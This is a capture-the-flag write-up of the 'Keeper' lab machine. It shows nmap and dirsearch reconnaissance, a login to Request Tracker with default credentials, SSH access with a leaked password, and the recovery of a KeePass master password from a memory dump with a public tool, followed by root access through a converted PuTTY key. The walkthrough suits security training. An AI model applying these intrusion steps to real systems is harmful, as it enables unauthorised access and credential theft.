Keeper

Scanning

sudo nmap -A -T4 -v 10.10.11.227 -oA scans/scan

Open ports SSH, HTTP

Discovered open port 22/tcp on 10.10.11.227
Discovered open port 80/tcp on 10.10.11.227

‣

Output

Lets checkout HTTP

After adding tickets.keeper.htb to /etc/hosts

Greeted with a login page, the page leaks the OS and software version

Best Practical RT 4.4.4

Before diving in here, lets fuzz for directories

dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -e php,txt,html -f -u http://tickets.keeper.htb

A ton of output

Lets exclude 302 status codes

dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://tickets.keeper.htb/ -x 302

A ton more reasonable

_|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220545

Output File: /home/kali/.dirsearch/reports/tickets.keeper.htb/-_23-10-31_09-52-14.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-10-31_09-52-14.log

Target: http://tickets.keeper.htb/

[09:52:14] Starting: 
[09:52:19] 200 -    2KB - /m
[09:52:20] 403 -    0B  - /l
[09:53:06] 200 -    4KB - /rt

Checkout /m

Mobile version?

Nothing new here really, lets try default creds?

This forum post gives the default password

Forgot admin password of RT

Team, I once logged in RT4 through admin account with default password (Password) and later on changed the admin password. Now I forgot the password of that account. I have also installed plugin RT-Extension-ResetPassword and used this feature to reset my admin account too but couldn’t succeed. Please help me in recovering password of username ‘admin’ Thank you.

forum.bestpractical.com

root:password

This works!

Poking around I found a new ticket:

tickets.keeper.htb

Two major clues here

Debug of keepass program
User mentions need to update software

A further update to the ticket mentions the user deleted the debug info because of security issues, so we can’t get it this way.

Poking around more, we find user: lnorgaard

tickets.keeper.htb

Default creds in the ticket comments!

lnorgaard:Welcome2023!

Can we SSH?

ssh lnorgaard@10.10.11.227
Welcome2023!

Grabbed user.txt

<redacted>

For root, we know the path already because of the ticket mentioning keepass. The users home directory has a .zip in it. We can assume this is the debugging file for the software.

Lets scp it over to our host.

scp lnorgaard@keeper.htb:RT30000.zip .

I was having errors deflating on my host, I’ll just unzip on the target and scp the resulting files.

scp lnorgaard@keeper.htb:KeePassDumpFull.dmp .
scp lnorgaard@keeper.htb:passcodes.kdbx .

Running strings on both didn’t turn anything useful.

Maybe we can extract the password from the mem dump.

We know the keepass version is out of date because of the ticket from before, I found this:

github.com

I would prefer an exploit without dotnet maybe someone wrote one in python

Embed GitHub

Using this one:

python3 keepass_dump.py -f ../KeePassDumpFull.dmp --skip --debug

‣

Output

dgre med flde

This password does not work, the user information says the employee is Danish, maybe this password is in Danish

Google translate:

rødgrød med fløde

Is this the password?

That worked!

Found root password

root:F4><3K0nd!

Password did not work, maybe this key in the notes

its a putty key file, we can convert this with puttygen

How to convert .ppk key to OpenSSH key under Linux?

I know that is possible to convert .ppk under puttygen in Windows, but how to do that on Linux? Is this possible ?

superuser.com

puttygen putty_key.ppk -O private-openssh -o key

That’s root!

cat root.txt
<redacted>